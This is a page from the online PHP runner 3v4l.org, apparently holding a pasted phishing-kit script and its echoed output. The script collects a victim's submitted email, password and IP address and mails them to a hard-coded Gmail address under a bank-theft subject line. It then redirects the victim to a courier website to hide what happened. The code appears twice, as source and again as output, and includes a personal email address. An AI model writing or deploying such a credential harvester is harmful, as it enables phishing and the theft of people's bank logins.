3v4l.org

run code in 300+ PHP versions simultaneously
<? $ip = getenv("REMOTE_ADDR"); $message .= "--------------Ali Spam ReZulT-----------------------\n"; $message .= "USERNAME : ".$_POST['email']."\n"; $message .= "Password : ".$_POST['pass']."\n"; $message .= "IP: ".$ip."\n"; $message .= "---------------Created By DAN------------------------------\n"; $recipient = "bar.marym@gmail.com"; $subject = "wang"; $headers = "From"; $headers .= $_POST['eMailAdd']."\n"; $headers .= "MIME-Version: 1.0\n"; mail("", "Allied Bank Spam RezulT(Thief)", $message); if (mail($recipient,$subject,$message,$headers)) { header("Location: http://www.dhl.com"); } else { echo "ERROR! Please go back and try again."; } ?>
Output for git.master, git.master_jit, rfc.property-hooks
<? $ip = getenv("REMOTE_ADDR"); $message .= "--------------Ali Spam ReZulT-----------------------\n"; $message .= "USERNAME : ".$_POST['email']."\n"; $message .= "Password : ".$_POST['pass']."\n"; $message .= "IP: ".$ip."\n"; $message .= "---------------Created By DAN------------------------------\n"; $recipient = "bar.marym@gmail.com"; $subject = "wang"; $headers = "From"; $headers .= $_POST['eMailAdd']."\n"; $headers .= "MIME-Version: 1.0\n"; mail("", "Allied Bank Spam RezulT(Thief)", $message); if (mail($recipient,$subject,$message,$headers)) { header("Location: http://www.dhl.com"); } else { echo "ERROR! Please go back and try again."; } ?>

This tab shows result from various feature-branches currently under review by the php developers. Contact me to have additional branches featured.

Active branches

Archived branches

Once feature-branches are merged or declined, they are no longer available. Their functionality (when merged) can be viewed from the main output page


preferences:
54.95 ms | 402 KiB | 8 Q